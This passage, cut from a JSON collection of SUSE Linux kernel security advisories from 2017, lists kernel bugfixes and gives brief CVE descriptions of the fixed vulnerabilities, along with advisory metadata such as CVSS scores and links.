consistent conditional judgement for ip fragment in\n __ip_append_data and ip_finish_output (bsc#1041958).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - ipv6: Should use consistent conditional judgement for ip6 fragment\n between __ip6_append_data and ip6_finish_output (bsc#1041958).\n - iwlwifi: missing error code in iwl_trans_pcie_alloc() (bsc#1031717).\n - iwlwifi: mvm: compare full command ID (FATE#321353, FATE#323335).\n - iwlwifi: mvm: do not send CTDP commands via debugfs if not supported\n (bsc#1031717).\n - iwlwifi: mvm: reset the fw_dump_desc pointer after ASSERT (bsc#1031717).\n - iwlwifi: mvm: synchronize firmware DMA paging memory (FATE#321353,\n FATE#323335).\n - iwlwifi: mvm: unconditionally stop device after init (bsc#1031717).\n - iwlwifi: mvm: unmap the paging memory before freeing it (FATE#321353,\n FATE#323335).\n - iwlwifi: pcie: fix command completion name debug (bsc#1031717).\n - kABI-fix for "x86/panic: replace smp_send_stop() with kdump friendly\n version in panic path" (bsc#1051478).\n - kABI: protect enum pid_type (kabi).\n - kABI: protect lwtunnel include in ip6_route.h (kabi).\n - kABI: protect struct iscsi_np (kabi).\n - kABI: protect struct iscsi_tpg_attrib (kabi).\n - kABI: protect struct se_lun (kabi).\n - kABI: protect struct tpm_chip (kabi).\n - kABI: protect struct xfrm_dst (kabi).\n - kABI: protect struct xfrm_dst (kabi).\n - kabi/severities: ignore nfs_pgio_data_destroy\n - kABI: uninline task_tgid_nr_nr (kabi).\n - kernel/*: switch to memdup_user_nul() (bsc#1048893).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: nVMX: fix msr bitmaps to prevent L2 from accessing L0 x2APIC\n (bsc#1051478).\n - kvm: nVMX: Fix nested_vmx_check_msr_bitmap_controls (bsc#1051478).\n - kvm: nVMX: Fix nested VPID vmx exec control (bsc#1051478).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - kvm: x86: avoid simultaneous queueing of both IRQ and SMI (bsc#1051478).\n - libnvdimm: fix badblock range handling of ARS range (bsc#1023175).\n - libnvdimm, pmem: fix a NULL pointer BUG in nd_pmem_notify (bsc#1023175).\n - lib: test_rhashtable: fix for large entry counts (bsc#1055359).\n - lib: test_rhashtable: Fix KASAN warning (bsc#1055359).\n - lightnvm: remove unused rq parameter of nvme_nvm_rqtocmd() to kill\n warning (FATE#319466).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - mac80211_hwsim: Replace bogus hrtimer clockid (bsc#1047651).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md: fix sleep in atomic (bsc#1040351).\n - md/raid5: fix a race condition in stripe batch (linux-stable).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mm: adaptive hash table scaling (bnc#1036303).\n - mm: call page_ext_init() after all struct pages are initialized (VM\n Debugging Functionality, bsc#1047048).\n - mm: drop HASH_ADAPT (bnc#1036303).\n - mm: fix classzone_idx underflow in shrink_zones() (VM Functionality,\n bsc#1042314).\n - mm, madvise: ensure poisoned pages are removed from per-cpu lists (VM hw\n poison -- git fixes).\n - mm: make PR_SET_THP_DISABLE immediately active (bnc#1048891).\n - mm/page_alloc.c: apply gfp_allowed_mask before the first allocation\n attempt (bnc#971975 VM -- git fixes).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - mptsas: Fixup device hotplug for VMWare ESXi (bsc#1030850).\n - mwifiex: do not update MCS set from hostapd (bsc#1031717).\n - net: account for current skb length when deciding about UFO\n (bsc#1041958).\n - net: ena: add hardware hints capability to the driver (bsc#1047121).\n - net: ena: add missing return when ena_com_get_io_handlers() fails\n (bsc#1047121).\n - net: ena: add missing unmap bars on device removal (bsc#1047121).\n - net: ena: add reset reason for each device FLR (bsc#1047121).\n - net: ena: add support for out of order rx buffers refill (bsc#1047121).\n - net: ena: allow the driver to work with small number of msix vectors\n (bsc#1047121).\n - net: ena: bug fix in lost tx packets detection mechanism (bsc#1047121).\n - net: ena: change return value for unsupported features unsupported\n return value (bsc#1047121).\n - net: ena: change sizeof() argument to be the type pointer (bsc#1047121).\n - net: ena: disable admin msix while working in polling mode (bsc#1047121).\n - net: ena: fix bug that might cause hang after consecutive open/close\n interface (bsc#1047121).\n - net: ena: fix race condition between submit and completion admin command\n (bsc#1047121).\n - net: ena: fix rare uncompleted admin command false alarm (bsc#1047121).\n - net: ena: fix theoretical Rx hang on low memory systems (bsc#1047121).\n - net: ena: separate skb allocation to dedicated function (bsc#1047121).\n - net: ena: update driver's rx drop statistics (bsc#1047121).\n - net: ena: update ena driver to version 1.1.7 (bsc#1047121).\n - net: ena: update ena driver to version 1.2.0 (bsc#1047121).\n - net: ena: use lower_32_bits()/upper_32_bits() to split dma address\n (bsc#1047121).\n - net: ena: use napi_schedule_irqoff when possible (bsc#1047121).\n - netfilter: fix IS_ERR_VALUE usage (bsc#1052888).\n - netfilter: x_tables: pack percpu counter allocations (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct instead of packet counter\n (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct to counter allocator\n (bsc#1052888).\n - net: handle NAPI_GRO_FREE_STOLEN_HEAD case also in napi_frags_finish()\n (bsc#1042286).\n - net/mlx5: Fix driver load error flow when firmware is stuck (git-fixes).\n - net: phy: Do not perform software reset for Generic PHY (bsc#1042286).\n - new helper: memdup_user_nul() (bsc#1048893).\n - nfs: Cache aggressively when file is open for writing (bsc#1033587).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nfs: Do not flush caches for a getattr that races with writeback\n (bsc#1033587).\n - nfs: flush data when locking a file to ensure cache coherence for mmap\n (bsc#981309).\n - nfs: invalidate file size when taking a lock (git-fixes).\n - nfs: only invalidate dentrys that are clearly invalid (bsc#1047118).\n - ocfs2: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ocfs2: fix deadlock caused by recursive locking in xattr (bsc#1012829).\n - ocfs2: Make ocfs2_set_acl() static (bsc#1030552).\n - of: fix "/cpus" reference leak in of_numa_parse_cpu_nodes()\n (bsc#1056827).\n - ovl: fix dentry leak for default_permissions (bsc#1054084).\n - pci: Add Mellanox device IDs (bsc#1051478).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: Convert Mellanox broken INTx quirks to be for listed devices only\n (bsc#1051478).\n - pci: Correct PCI_STD_RESOURCE_END usage (bsc#1051478).\n - pci: dwc: dra7xx: Use RW1C for IRQSTATUS_MSI and IRQSTATUS_MAIN\n (bsc#1051478).\n - pci: dwc: Fix uninitialized variable in dw_handle_msi_irq()\n (bsc#1051478).\n - pci: Enable ECRC only if device supports it (bsc#1051478).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci / pm: Fix native PME handling during system suspend/resume\n (bsc#1051478).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - pci: Support INTx masking on ConnectX-4 with firmware x.14.1100+\n (bsc#1051478).\n - percpu_ref: allow operation mode switching operations to be called\n concurrently (bsc#1055096).\n - percpu_ref: remove unnecessary RCU grace period for staggered atomic\n switching confirmation (bsc#1055096).\n - percpu_ref: reorganize __percpu_ref_switch_to_atomic() and relocate\n percpu_ref_switch_to_atomic() (bsc#1055096).\n - percpu_ref: restructure operation mode switching (bsc#1055096).\n - percpu_ref: unify staggered atomic switching wait behavior (bsc#1055096).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: Fix spurious NMI with PEBS Load Latency event (bsc#1051478).\n - perf/x86/intel: Cure bogus unwind from PEBS entries (bsc#1051478).\n - perf/x86/intel: Fix PEBSv3 record drain (bsc#1051478).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - platform/x86: ideapad-laptop: Add IdeaPad 310-15IKB to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add IdeaPad V310-15ISK to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add IdeaPad V510-15IKB to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Lenovo Yoga 910-13IKB to no_hw_rfkill\n dmi list (bsc#1051022).\n - platform/x86: ideapad-laptop: Add several models to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y520-15IKBN to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y700 15-ACZ to no_hw_rfkill DMI list\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y720-15IKBN to no_hw_rfkill\n (bsc#1051022).\n - pm / Hibernate: Fix scheduling while atomic during hibernation\n (bsc#1051059).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - prctl: propagate has_child_subreaper flag to every descendant\n (bnc#1022476).\n - qeth: fix L3 next-hop im xmit qeth hdr (bnc#1052773, LTC#157374).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - reiserfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - Revert "ACPI / video: Add force_native quirk for HP Pavilion dv6"\n (bsc#1031717).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "powerpc/numa: Fix percpu allocations to be NUMA aware"\n (bsc#1048914).\n - Revert "tpm: Issue a TPM2_Shutdown for TPM2 devices." (kabi).\n - rpm/kernel-binary.spec.in: find-debuginfo.sh should not touch build-id\n This needs rpm-4.14+ (bsc#964063).\n - rtnetlink: fix rtnl_vfinfo_size (bsc#1056261).\n - s390: export symbols for crash-kmp (bsc#1053915).\n - sched/core: Allow __sched_setscheduler() in interrupts when PI is not\n used (bnc#1022476).\n - sched/debug: Print the scheduler topology group mask (bnc#1022476).\n - sched/fair, cpumask: Export for_each_cpu_wrap() (bnc#1022476).\n - sched/fair: Fix O(nr_cgroups) in load balance path (bnc#1022476).\n - sched/fair: Use task_groups instead of leaf_cfs_rq_list to walk all\n cfs_rqs (bnc#1022476).\n - sched/topology: Add sched_group_capacity debugging (bnc#1022476).\n - sched/topology: Fix building of overlapping sched-groups (bnc#1022476).\n - sched/topology: Fix overlapping sched_group_capacity (bnc#1022476).\n - sched/topology: Move comment about asymmetric node setups (bnc#1022476).\n - sched/topology: Refactor function build_overlap_sched_groups()\n (bnc#1022476).\n - sched/topology: Remove FORCE_SD_OVERLAP (bnc#1022476).\n - sched/topology: Simplify build_overlap_sched_groups() (bnc#1022476).\n - sched/topology: Small cleanup (bnc#1022476).\n - sched/topology: Verify the first group matches the child domain\n (bnc#1022476).\n - scsi: Add STARGET_CREATE_REMOVE state to scsi_target_state (bsc#1013887).\n - scsi: bnx2i: missing error code in bnx2i_ep_connect() (bsc#1048221).\n - scsi_devinfo: fixup string compare (bsc#1037404).\n - scsi_dh_alua: suppress errors from unsupported devices (bsc#1038792).\n - scsi: ILLEGAL REQUEST + ASC==27 =&gt; target failure (bsc#1059465).\n - scsi: kABI fix for new state STARGET_CREATED_REMOVE (bsc#1013887).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi: storvsc: Workaround for virtual DVD SCSI version (fate#320485,\n bnc#1044636).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - smsc75xx: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n - sr9700: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n - supported.conf: clear mistaken external support flag for cifs.ko\n (bsc#1053802).\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - sysctl: do not print negative flag for proc_douintvec (bnc#1046985).\n - sysctl: fix lax sysctl_check_table() sanity check (bsc#1048893).\n - sysctl: fold sysctl_writes_strict checks into helper (bsc#1048893).\n - sysctl: kdoc'ify sysctl_writes_strict (bsc#1048893).\n - sysctl: simplify unsigned int support (bsc#1048893).\n - timers: Plug locking race vs. timer migration (bnc#1022476).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tpm: fix: return rc when devm_add_action() fails (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048, git-fixes\n 8e0ee3c9faed).\n - tpm: Issue a TPM2_Shutdown for TPM2 devices (bsc#1053117).\n - tpm: KABI fix (bsc#1053117).\n - tpm: read burstcount from TPM_STS in one 32-bit transaction\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes 27084efee0c3).\n - tpm_tis_core: Choose appropriate timeout for reading burstcount\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes aec04cbdf723).\n - tpm_tis_core: convert max timeouts from msec to jiffies (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048, git-fixes\n aec04cbdf723).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - tty: serial: msm: Support more bauds (git-fixes).\n - ubifs: Correctly evict xattr inodes (bsc#1012829).\n - ubifs: Do not leak kernel memory to the MTD (bsc#1012829).\n - udf: Fix deadlock between writeback and udf_setsize() (bsc#1012829).\n - udf: Fix races with i_size changes during readpage (bsc#1012829).\n - usb: core: fix device node leak (bsc#1047487).\n - vfs: fix missing inode_get_dev sites (bsc#1052049).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/dmi: Switch dmi_remap() from ioremap() to ioremap_cache()\n (bsc#1051399).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - x86/LDT: Print the real LDT base address (bsc#1051478).\n - x86/mce: Make timer handling more robust (bsc#1042422).\n - x86/panic: replace smp_send_stop() with kdump friendly version in panic\n path (bsc#1051478).\n - xen: allocate page for shared info page from low memory (bnc#1038616).\n - xen/balloon: do not online new memory initially (bnc#1028173).\n - xen: hold lock_device_hotplug throughout vcpu hotplug operations\n (bsc#1042422).\n - xen-netfront: Rework the fix for Rx stall during OOM and network stress\n (git-fixes).\n - xen/pvh*: Support &gt; 32 VCPUs at domain restore (bnc#1045563).\n - xfrm: NULL dereference on allocation failure (bsc#1047343).\n - xfrm: Oops on error in pfkey_msg2xfrm_state() (bsc#1047653).\n - xfs/dmapi: fix incorrect file-&gt;f_path.dentry-&gt;d_inode usage\n (bsc#1055896).\n - xfs: do not BUG() on mixed direct and mapped I/O (bsc#1050188).\n - xfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - xfs: fix inobt inode allocation search optimization (bsc#1012829).\n\n", "edition": 1, "modified": "2017-10-27T18:31:25", "published": "2017-10-27T18:31:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00077.html", "id": "SUSE-SU-2017:2869-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-01T01:22:40", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13080", "CVE-2017-14489", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-1000253", "CVE-2017-12192"], "description": "The SUSE Linux Enterprise 11 SP4 Realtime kernel was updated to receive\n various security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-15274: security/keys/keyctl.c in the Linux kernel did not\n consider the case of a NULL payload in conjunction with a nonzero length\n value, which allowed local users to cause a denial of service (NULL\n pointer dereference and OOPS) via a crafted add_key or keyctl system\n call, a different vulnerability than CVE-2017-12192 (bnc#1045327).\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-1000253: Setuid root PIE binaries could still be exploited to\n gain local root access due missing overlapping memory checking in the\n ELF loader in the Linux Kernel. (bnc#1059525).\n\n The following non-security bugs were fixed:\n\n - blacklist.conf: blacklist bfedb589252c ("mm: Add a user_ns owner to\n mm_struct and fix ptrace permission checks") (bnc#1044228)\n - bnx2x: prevent crash when accessing PTP with interface down\n (bsc#1060665).\n - drm/mgag200: Fixes for G200eH3. (bnc#1062842)\n - fs/binfmt_elf.c:load_elf_binary(): return -EINVAL on zero-length\n mappings (bnc#1059525).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#909484\n FATE#317397).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - lustre: Fix "getcwd: Close race with d_move called by lustre" for -rt\n Convert added spin_lock/unlock() of ->d_lock to seqlock variants.\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061180).\n - netback: coalesce (guest) RX SKBs as needed (bsc#1056504).\n - nfs: Remove asserts from the NFS XDR code (bsc#1063544).\n - powerpc: Fix the corrupt r3 error during MCE handling (bnc#1056230).\n - powerpc: Make sure IPI handlers see data written by IPI senders\n (bnc#1056230).\n - powerpc/xics: Harden xics hypervisor backend (bnc#1056230).\n - s390/cpcmd,vmcp: avoid GFP_DMA allocations (bnc#1060245, LTC#159112).\n - s390/qdio: avoid reschedule of outbound tasklet once killed\n (bnc#1063301, LTC#159885).\n - s390/topology: alternative topology for topology-less machines\n (bnc#1060245, LTC#159177).\n - s390/topology: enable / disable topology dynamically (bnc#1060245,\n LTC#159177).\n - scsi: qla2xxx: Get mutex lock before checking optrom_state (bsc#1053317).\n - scsi: reset wait for IO completion (bsc#996376).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1060245, LTC#158494).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1060245, LTC#158493).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1060245, LTC#158494).\n - Update config files. (bsc#1057796) The CONFIG_MODULE_SIG_UEFI should be\n enabled on x86_64/xen architecture because xen can work with shim on\n x86_64. Enabling the following kernel config to load certificate from\n db/mok: +CONFIG_MODULE_SIG_BLACKLIST=y +CONFIG_MODULE_SIG_UEFI=y\n - virtio_scsi: do not call virtqueue_add_sgs(... GFP_NOIO) holding\n spinlock (bsc#1036286).\n\n", "edition": 1, "modified": "2017-11-30T21:08:12", "published": "2017-11-30T21:08:12", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00082.html", "id": "SUSE-SU-2017:3165-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-09T00:32:08", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-1000111", "CVE-2017-7518", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-8831", "CVE-2017-10810", "CVE-2017-14106", "CVE-2017-11473", "CVE-2017-7533", "CVE-2017-1000251", "CVE-2017-1000112", "CVE-2017-7541", "CVE-2017-12134", "CVE-2017-7542", "CVE-2017-12154", "CVE-2017-1000365"], "description": "The SUSE Linux Enterprise 12 SP2 RT kernel was updated to 4.4.88 to\n receive various security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-1000365: The Linux Kernel imposes a size restriction on the\n arguments and environmental strings passed through\n RLIMIT_STACK/RLIM_INFINITY (1/4 of the size), but did not take the\n argument and environment pointers into account, which allowed attackers\n to bypass this limitation (bnc#1039354)\n - CVE-2017-1000112: Prevent race condition in net-packet code that could\n have been exploited by unprivileged users to gain root access.\n (bnc#1052311)\n - CVE-2017-1000251: The native Bluetooth stack was vulnerable to a stack\n overflow vulnerability in the processing of L2CAP configuration\n responses resulting in remote code execution in kernel space\n (bnc#1057389)\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c allowed local users to cause a denial of\n service (memory corruption and system crash) by leveraging root access\n (bnc#1056588)\n - CVE-2017-8831: The saa7164_bus_get function allowed local users to cause\n a denial of service (out-of-bounds array access) or possibly have\n unspecified\n other impact by changing a certain sequence-number value, aka a "double\n fetch" vulnerability (bnc#1037994)\n - CVE-2017-1000252: Wrong gsi values via KVM_IRQFD allowed unprivileged\n users using KVM to cause DoS on Intel systems (bsc#1058038).\n - CVE-2017-1000111: Prevent in packet_set_ring on PACKET_RESERVE\n (bsc#1052365).\n - CVE-2017-10810: Memory leak in the virtio_gpu_object_create function in\n drivers/gpu/drm/virtio/virtgpu_object.c allowed attackers to cause a\n denial of service (memory consumption) by triggering\n object-initialization failures (bnc#1047277).\n - CVE-2017-11472: The acpi_ns_terminate() function did not flush the\n operand cache and causes a kernel stack dump, which allowed local users\n to obtain sensitive information from kernel memory and bypass the KASLR\n protection mechanism via a crafted ACPI table (bnc#1049580).\n - CVE-2017-11473: Buffer overflow in the mp_override_legacy_irq() function\n allowed local users to gain privileges via a crafted ACPI table\n (bnc#1049603).\n - CVE-2017-12134: The xen_biovec_phys_mergeable function might have allow\n local OS guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause a denial of\n service, or gain host OS privileges by leveraging incorrect block IO\n merge-ability calculation (bnc#1051790).\n - CVE-2017-12154: L2 guest could have accessed hardware(L0) CR8 register\n and crashed the host system (bsc#1058507).\n - CVE-2017-14106: The tcp_disconnect function allowed local users to cause\n a denial of service (__tcp_select_window divide-by-zero error and system\n crash) by triggering a disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n - CVE-2017-7518: Faulty debug exception via syscall emulation allowed\n non-linux guests to escalate their privileges in the guest (bsc#1045922).\n - CVE-2017-7533: Race condition in the fsnotify implementation allowed\n local users to gain privileges or cause a denial of service (memory\n corruption) via a crafted application that leverages simultaneous\n execution of the inotify_handle_event and vfs_rename functions\n (bsc#1049483).\n - CVE-2017-7541: The brcmf_cfg80211_mgmt_tx function allowed local users\n to cause a denial of service (buffer overflow and system crash) or\n possibly gain privileges via a crafted NL80211_CMD_FRAME Netlink packet\n (bsc#1049645).\n - CVE-2017-7542: The ip6_find_1stfragopt function allowed local users to\n cause a denial of service (integer overflow and infinite loop) by\n leveraging the ability to open a raw socket (bsc#1049882).\n\n The following non-security bugs were fixed:\n\n - ACPI / processor: Avoid reserving IO regions too early (bsc#1051478).\n - ACPI / scan: Prefer devices without _HID for _ADR matching.\n - ALSA: fm801: Initialize chip after IRQ handler is registered\n (bsc#1031717).\n - ALSA: hda - Add stereo mic quirk for Lenovo G50-70 (17aa:3978)\n (bsc#1020657).\n - ALSA: hda - Fix endless loop of codec configure (bsc#1031717).\n - ALSA: hda - Implement mic-mute LED mode enum (bsc#1055013).\n - ALSA: hda - set input_path bitmap to zero after moving it to new place\n (bsc#1031717).\n - ALSA: hda/realtek - Add support headphone Mic for ALC221 of HP platform\n (bsc#1024405).\n - ALSA: ice1712: Add support for STAudio ADCIII (bsc#1048934).\n - ALSA: usb-audio: Apply sample rate quirk to Sennheiser headset\n (bsc#1052580).\n - Add "shutdown" to "struct class" (bsc#1053117).\n - Bluetooth: bnep: fix possible might sleep error in bnep_session\n (bsc#1031784).\n - Bluetooth: cmtp: fix possible might sleep error in cmtp_session\n (bsc#1031784).\n - Bluetooth: hidp: fix possible might sleep error in hidp_session_thread\n (bsc#1031784).\n - Drivers: hv: Fix the bug in generating the guest ID.\n - Drivers: hv: util: Fix a typo.\n - Drivers: hv: vmbus: Get the current time from the current clocksource\n (bnc#1044112, bnc#1042778, bnc#1029693).\n - Drivers: hv: vmbus: Move the code to signal end of message.\n - Drivers: hv: vmbus: Move the definition of generate_guest_id().\n - Drivers: hv: vmbus: Move the definition of hv_x64_msr_hypercall_contents.\n - Drivers: hv: vmbus: Restructure the clockevents code.\n - Fix kABI breakage by KVM CVE fix (bsc#1045922).\n - IB/hfi1: Wait for QSFP modules to initialize (bsc#1019151).\n - Input: gpio-keys - fix check for disabling unsupported keys\n (bsc#1031717).\n - KVM: nVMX: Fix nested VPID vmx exec control (bsc#1051478).\n - KVM: nVMX: fix msr bitmaps to prevent L2 from accessing L0 x2APIC\n (bsc#1051478).\n - KVM: x86: avoid simultaneous queueing of both IRQ and SMI (bsc#1051478).\n - MD: fix sleep in atomic (bsc#1040351).\n - More Git-commit header fixups No functional change intended.\n - NFS: Cache aggressively when file is open for writing (bsc#1033587).\n - NFS: Do not flush caches for a getattr that races with writeback\n (bsc#1033587).\n - NFS: 